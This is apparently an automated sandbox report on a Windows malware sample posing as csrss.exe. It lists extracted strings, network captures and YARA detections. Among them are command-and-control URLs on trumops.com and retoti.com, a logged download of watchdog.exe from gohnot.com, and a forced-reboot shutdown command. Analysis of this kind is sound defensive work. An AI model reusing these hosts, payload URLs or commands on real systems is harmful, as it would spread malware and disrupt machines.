Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Nov 2021 00:58:41 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-powered-by: PHP/8.0.11set-cookie: PHPSESSID=4ujbsd6crmkskigbel52akbion; path=/; HttpOnlyexpires: Thu, 19 Nov 1981 08:52:00 GMTcache-control: no-store, no-cache, must-revalidatepragma: no-cacheaccess-control-allow-credentials: falseCF-Cache-Status: DYNAMICExpect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ryIHSGUMxFPJ%2F1e4qghNO%2FLH6YHJuD1QQg3lP1u0%2BXF1eYpABsushydm506ZkuU1RkdCCxRbUIoxtS3RvmeD7XMScKD9Nd4FY3%2Bt%2Fz7lrD9OZ3nlNfnYz5B0JVNarhQrNImsp3fS"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6ac392db8b07f407-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400

Source: csrss.exe	String found in binary or memory: .30 Version/10.61facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)tls: received unexpected handshake message of type %T when waiting for %TBlackBerry7100i/4.1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/103Mozilla/5.0 (Windows NT equals www.facebook.com (Facebook)
Source: csrss.exe	String found in binary or memory: lla/5.0 (compatible; Konqueror/3.3; Linux 2.6.8-gentoo-r3; X11;facebookscraper/1.0( http://www.facebook.com/sharescraper_help.php)2695994666715063979466701508701962594045780771442439172168272236806126959946667150639794667015087019630673557916260026308143510066 equals www.facebook.com (Facebook)

Source: csrss.exe	String found in binary or memory: http://archive.org/details/archive.org_bot)Mozilla/5.0
Source: csrss.exe	String found in binary or memory: http://builtwith.com/biup)
Source: 4t4y4r89UZ.exe, 00000000.00000002.293844995.0000000004C28000.00000040.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.320126645.0000000004BB5000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.553003907.0000000005200000.00000040.00000001.sdmp, csrss.exe, 00000010.00000002.364381433.0000000005200000.00000040.00000001.sdmp, csrss.exe, 00000017.00000002.393120243.0000000005200000.00000040.00000001.sdmp, csrss.exe, 00000022.00000002.387543295.0000000005200000.00000040.00000001.sdmp, csrss.exe, 00000032.00000002.400160271.0000000005200000.00000040.00000001.sdmp	String found in binary or memory: http://crl.g
Source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.554614867.0000000005700000.00000040.00000001.sdmp, csrss.exe, 00000010.00000002.365686923.0000000005700000.00000040.00000001.sdmp, csrss.exe, 00000017.00000002.391872989.00000000009F9000.00000040.00020000.sdmp, csrss.exe, 00000022.00000002.380920089.00000000009F9000.00000040.00020000.sdmp	String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.554614867.0000000005700000.00000040.00000001.sdmp, csrss.exe, 00000010.00000002.365686923.0000000005700000.00000040.00000001.sdmp, csrss.exe, 00000017.00000002.391872989.00000000009F9000.00000040.00020000.sdmp, csrss.exe, 00000022.00000002.380920089.00000000009F9000.00000040.00020000.sdmp	String found in binary or memory: http://crl.globalsign.net/Root.crl0
Source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.554614867.0000000005700000.00000040.00000001.sdmp, csrss.exe, 00000010.00000002.365686923.0000000005700000.00000040.00000001.sdmp, csrss.exe, 00000017.00000002.391872989.00000000009F9000.00000040.00020000.sdmp, csrss.exe, 00000022.00000002.380920089.00000000009F9000.00000040.00020000.sdmp	String found in binary or memory: http://crl.globalsign.net/primobject.crl0
Source: csrss.exe, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp	String found in binary or memory: http://devlog.gregarius.net/docs/ua)Links
Source: csrss.exe	String found in binary or memory: http://gais.cs.ccu.edu.tw/robot.php)Gulper
Source: csrss.exe, 0000000E.00000003.380180308.000000001688A000.00000004.00000001.sdmp	String found in binary or memory: http://gohnot.com/61c75dbee3f325b4d87cddaf5bae3393
Source: csrss.exe, 0000000E.00000003.376871175.0000000016B3E000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000003.378698151.000000001697C000.00000004.00000001.sdmp	String found in binary or memory: http://gohnot.com/61c75dbee3f325b4d87cddaf5bae3393/watchdog.exe
Source: csrss.exe	String found in binary or memory: http://grub.org)Mozilla/5.0
Source: csrss.exe	String found in binary or memory: http://help.ya
Source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp	String found in binary or memory: http://https://_bad_pdb_file.pdb
Source: csrss.exe, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp	String found in binary or memory: http://ip-api.com/jsonhttp://localhost:3433/icarus.tetradrachm.netidna:
Source: csrss.exe	String found in binary or memory: http://misc.yahoo.com.cn/he
Source: csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp	String found in binary or memory: http://newscommer.com/app/app.exe
Source: csrss.exe	String found in binary or memory: http://search.msn.com/msnb
Source: csrss.exe, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp	String found in binary or memory: http://search.msn.com/msnbot.htm)msnbot/1.1
Source: csrss.exe, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp	String found in binary or memory: http://search.msn.com/msnbot.htm)net/http:
Source: 4t4y4r89UZ.exe, 00000000.00000003.284065740.00000000058F0000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.317378119.0000000000400000.00000040.00020000.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp	String found in binary or memory: http://search.msn.com/msnbot.htm)pkcs7:
Source: csrss.exe	String found in binary or memory: http://www.alexa.com/help/webmasters;
Source: csrss.exe	String found in binary or memory: http://www.archive.org/details/archive.org_bot)Opera/9.80
Source: csrss.exe, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp	String found in binary or memory: http://www.avantbrowser.com)MOT-V9mm/00.62
Source: csrss.exe	String found in binary or memory: http://www.baidu.com/search/spide
Source: 4t4y4r89UZ.exe, 00000000.00000003.284065740.00000000058F0000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.317378119.0000000000400000.00000040.00020000.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp	String found in binary or memory: http://www.baidu.com/search/spider.htm)MobileSafari/600.1.4
Source: svchost.exe, 00000005.00000002.309019102.0000029B1CA13000.00000004.00000001.sdmp	String found in binary or memory: http://www.bingmapsportal.comsv
Source: csrss.exe	String found in binary or memory: http://www.bloglines.com)F
Source: csrss.exe	String found in binary or memory: http://www.everyfeed.c
Source: csrss.exe	String found in binary or memory: http://www.exabot.com/go/robot)Opera/9.80
Source: csrss.exe	String found in binary or memory: http://www.google.com/adsbot.html)Encountered
Source: csrss.exe	String found in binary or memory: http://www.google.com/bot.html)Mozilla/5.0
Source: csrss.exe	String found in binary or memory: http://www.google.com/bot.html)tls:
Source: csrss.exe	String found in binary or memory: http://www.google.com/feedfetcher.html)HKLM
Source: csrss.exe	String found in binary or memory: http://www.googlebot.com/bot.html)Links
Source: csrss.exe	String found in binary or memory: http://www.spidersoft.com)Wget/1.9
Source: csrss.exe	String found in binary or memory: http://yandex.com/bots)Opera/9.51
Source: csrss.exe	String found in binary or memory: http://yandex.com/bots)Opera/9.80
Source: svchost.exe, 00000003.00000002.546936474.000001CE84443000.00000004.00000001.sdmp	String found in binary or memory: https://%s.dnet.xboxlive.com
Source: svchost.exe, 00000003.00000002.546936474.000001CE84443000.00000004.00000001.sdmp	String found in binary or memory: https://%s.xboxlive.com
Source: svchost.exe, 00000003.00000002.546936474.000001CE84443000.00000004.00000001.sdmp	String found in binary or memory: https://activity.windows.com
Source: svchost.exe, 00000003.00000002.546936474.000001CE84443000.00000004.00000001.sdmp	String found in binary or memory: https://activity.windows.comr
Source: svchost.exe, 00000005.00000003.307750907.0000029B1CA62000.00000004.00000001.sdmp	String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp	String found in binary or memory: https://blockchain.infoindex
Source: svchost.exe, 00000003.00000002.546936474.000001CE84443000.00000004.00000001.sdmp	String found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 00000003.00000002.546936474.000001CE84443000.00000004.00000001.sdmp	String found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 00000005.00000003.307756763.0000029B1CA5E000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000005.00000003.307762836.0000029B1CA59000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 00000005.00000003.307750907.0000029B1CA62000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 00000005.00000002.309058187.0000029B1CA3D000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 00000005.00000003.307762836.0000029B1CA59000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
Source: svchost.exe, 00000005.00000003.307750907.0000029B1CA62000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 00000005.00000003.307813476.0000029B1CA47000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 00000005.00000003.307762836.0000029B1CA59000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 00000005.00000003.307750907.0000029B1CA62000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
Source: svchost.exe, 00000005.00000002.309058187.0000029B1CA3D000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 00000005.00000003.307750907.0000029B1CA62000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 00000005.00000003.307750907.0000029B1CA62000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 00000005.00000003.307750907.0000029B1CA62000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 00000005.00000003.307846418.0000029B1CA41000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 00000005.00000003.307846418.0000029B1CA41000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
Source: svchost.exe, 00000005.00000003.307750907.0000029B1CA62000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 00000005.00000003.307762836.0000029B1CA59000.00000004.00000001.sdmp, svchost.exe, 00000005.00000003.307775473.0000029B1CA40000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 00000005.00000003.307756763.0000029B1CA5E000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 00000005.00000003.307762836.0000029B1CA59000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000005.00000003.307762836.0000029B1CA59000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000005.00000003.307813476.0000029B1CA47000.00000004.00000001.sdmp, svchost.exe, 00000005.00000003.307846418.0000029B1CA41000.00000004.00000001.sdmp, svchost.exe, 00000005.00000003.307775473.0000029B1CA40000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.t
Source: svchost.exe, 00000005.00000003.307750907.0000029B1CA62000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 00000005.00000002.309058187.0000029B1CA3D000.00000004.00000001.sdmp	String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000005.00000003.286135165.0000029B1CA32000.00000004.00000001.sdmp	String found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: csrss.exe, 0000000E.00000003.379613534.00000000168D6000.00000004.00000001.sdmp	String found in binary or memory: https://logs.trumops.com
Source: csrss.exe, 0000000E.00000003.379613534.00000000168D6000.00000004.00000001.sdmp	String found in binary or memory: https://logs.trumops.comhttps://runmodes.com/api/loghttps://server8.trumops.comC:
Source: csrss.exe	String found in binary or memory: https://raw.githubusercontent.com/spesmilo/electrum/master/electrum/servers.jsontls:
Source: 4t4y4r89UZ.exe, 00000000.00000002.299163430.0000000015CC4000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.327559047.00000000160BC000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000003.379613534.00000000168D6000.00000004.00000001.sdmp, csrss.exe, 00000010.00000002.377353014.0000000016810000.00000004.00000001.sdmp, csrss.exe, 00000017.00000002.397681987.000000001680E000.00000004.00000001.sdmp, csrss.exe, 00000022.00000002.391603610.0000000016810000.00000004.00000001.sdmp	String found in binary or memory: https://retoti.com
Source: csrss.exe, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp	String found in binary or memory: https://retoti.comidentifier
Source: csrss.exe, 0000000E.00000002.557421639.00000000168DE000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000003.379613534.00000000168D6000.00000004.00000001.sdmp	String found in binary or memory: https://runmodes.com/api/log
Source: csrss.exe, 0000000E.00000002.557421639.00000000168DE000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000003.379613534.00000000168D6000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.558065286.0000000016974000.00000004.00000001.sdmp	String found in binary or memory: https://server8.trumops.com
Source: csrss.exe, 0000000E.00000003.379435337.00000000168F0000.00000004.00000001.sdmp	String found in binary or memory: https://server8.trumops.com/api/cdn?c=3e3f6b9a36a75d40&uuid=f7873597-7b36-4441-9416-097456f134ae
Source: csrss.exe, 0000000E.00000002.556753831.0000000016861000.00000004.00000001.sdmp	String found in binary or memory: https://server8.trumops.com/api/pollf
Source: csrss.exe, 0000000E.00000002.558133841.00000000169C0000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000003.378575314.00000000169C0000.00000004.00000001.sdmp	String found in binary or memory: https://server8.trumops.com/bots/post-ia-data?uuid=f7873597-7b36-4441-9416-097456f134ae
Source: csrss.exe, 0000000E.00000002.558447548.0000000016AC4000.00000004.00000001.sdmp	String found in binary or memory: https://server8.trumops.comc=3e3f6b9a36a75d40&uuid=server8.trumops.com:443server8.trumops.com:443tcp
Source: csrss.exe, 0000000E.00000003.378367742.00000000169DE000.00000004.00000001.sdmp	String found in binary or memory: https://server8.trumops.comserver8.trumops.com:443server8.trumops.com:443tcpserver8.trumops.com
Source: csrss.exe, 0000000E.00000003.378367742.00000000169DE000.00000004.00000001.sdmp	String found in binary or memory: https://server8.trumops.comserver8.trumops.com:443server8.trumops.com:443tcpserver8.trumops.comws2_3
Source: csrss.exe, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp	String found in binary or memory: https://sitescore.aiValue
Source: svchost.exe, 00000005.00000002.309058187.0000029B1CA3D000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 00000005.00000002.309058187.0000029B1CA3D000.00000004.00000001.sdmp, svchost.exe, 00000005.00000002.309019102.0000029B1CA13000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 00000005.00000003.307775473.0000029B1CA40000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000005.00000003.307775473.0000029B1CA40000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000005.00000003.286135165.0000029B1CA32000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 00000005.00000003.286135165.0000029B1CA32000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 00000005.00000003.307813476.0000029B1CA47000.00000004.00000001.sdmp	String found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
Source: csrss.exe, 0000000E.00000002.556988618.0000000016892000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000003.379613534.00000000168D6000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.557380093.00000000168D6000.00000004.00000001.sdmp, csrss.exe, 00000010.00000002.377353014.0000000016810000.00000004.00000001.sdmp, csrss.exe, 00000017.00000002.397681987.000000001680E000.00000004.00000001.sdmp, csrss.exe, 00000022.00000002.391603610.0000000016810000.00000004.00000001.sdmp	String found in binary or memory: https://trumops.com
Source: csrss.exe	String found in binary or memory: https://trumops.com/api/install-failureinvalid
Source: 4t4y4r89UZ.exe, 00000000.00000002.299142381.0000000015CBA000.00000004.00000001.sdmp	String found in binary or memory: https://trumops.comServiceVersionServiceVersionServersVersionServersVersionDistributorIDCampaignIDOS
Source: csrss.exe, 0000000E.00000002.557380093.00000000168D6000.00000004.00000001.sdmp	String found in binary or memory: https://trumops.comhttps://retoti.com
Source: 4t4y4r89UZ.exe, 0000000A.00000002.327559047.00000000160BC000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000003.379613534.00000000168D6000.00000004.00000001.sdmp, csrss.exe, 00000010.00000002.377353014.0000000016810000.00000004.00000001.sdmp, csrss.exe, 00000017.00000002.397681987.000000001680E000.00000004.00000001.sdmp, csrss.exe, 00000022.00000002.391603610.0000000016810000.00000004.00000001.sdmp	String found in binary or memory: https://trumops.comhttps://retoti.comServiceVersionServersVersionDistributorIDCampaignIDOSCaptionMic
Source: 4t4y4r89UZ.exe, 00000000.00000002.299163430.0000000015CC4000.00000004.00000001.sdmp	String found in binary or memory: https://trumops.comhttps://retoti.comhttps://trumops.comhttps://retoti.comFirstInstallDateFirstInsta
Source: csrss.exe, 00000010.00000002.377377894.0000000016814000.00000004.00000001.sdmp, csrss.exe, 00000017.00000002.397738853.0000000016814000.00000004.00000001.sdmp	String found in binary or memory: https://trumops.comhttps://retoti.comhttps://trumops.comhttps://retoti.comS-1-5-21-3853321935-212556
Source: 4t4y4r89UZ.exe, 00000000.00000003.284065740.00000000058F0000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.317378119.0000000000400000.00000040.00020000.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp	String found in binary or memory: https://trumops.comif-unmodified-sinceillegal
Source: csrss.exe, csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmp	String found in binary or memory: https://turnitin.com/robot/crawlerinfo.html)gentraceback

Source: unknown

HTTP traffic detected: POST /api/log HTTP/1.1Host: runmodes.comUser-Agent: Go-http-client/1.1Content-Length: 144Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzip

Source: unknown

DNS traffic detected: queries for: trumops.com

Source: global traffic	HTTP traffic detected: GET /api/cdn?c=3e3f6b9a36a75d40&uuid=f7873597-7b36-4441-9416-097456f134ae HTTP/1.1Host: server8.trumops.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /61c75dbee3f325b4d87cddaf5bae3393/watchdog.exe HTTP/1.1Host: gohnot.comUser-Agent: Go-http-client/1.1Uuid: f7873597-7b36-4441-9416-097456f134aeVersion: 183Accept-Encoding: gzip

System Summary:

Uses shutdown.exe to shutdown or reboot the system

Show sources

Source: C:\Windows\rss\csrss.exe

Process created: C:\Windows\SysWOW64\shutdown.exe shutdown -r -t 5

Source: 4t4y4r89UZ.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 0.2.4t4y4r89UZ.exe.9a56e0.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 23.2.csrss.exe.9ab080.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 23.3.csrss.exe.65540e0.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 14.3.csrss.exe.655bce0.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 10.2.4t4y4r89UZ.exe.9ad2e0.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 50.2.csrss.exe.5ca4f30.11.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 0.2.4t4y4r89UZ.exe.9ad2e0.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 10.3.4t4y4r89UZ.exe.5e2bce0.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 16.2.csrss.exe.9ab080.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 16.3.csrss.exe.65540e0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 34.2.csrss.exe.9ab080.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 42.3.csrss.exe.655bce0.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 0.2.4t4y4r89UZ.exe.55e4f30.9.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 34.2.csrss.exe.9ad2e0.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 42.2.csrss.exe.5caa8d0.9.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 0.3.4t4y4r89UZ.exe.5e99a80.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 14.2.csrss.exe.9a56e0.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 23.2.csrss.exe.5ca4f30.9.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
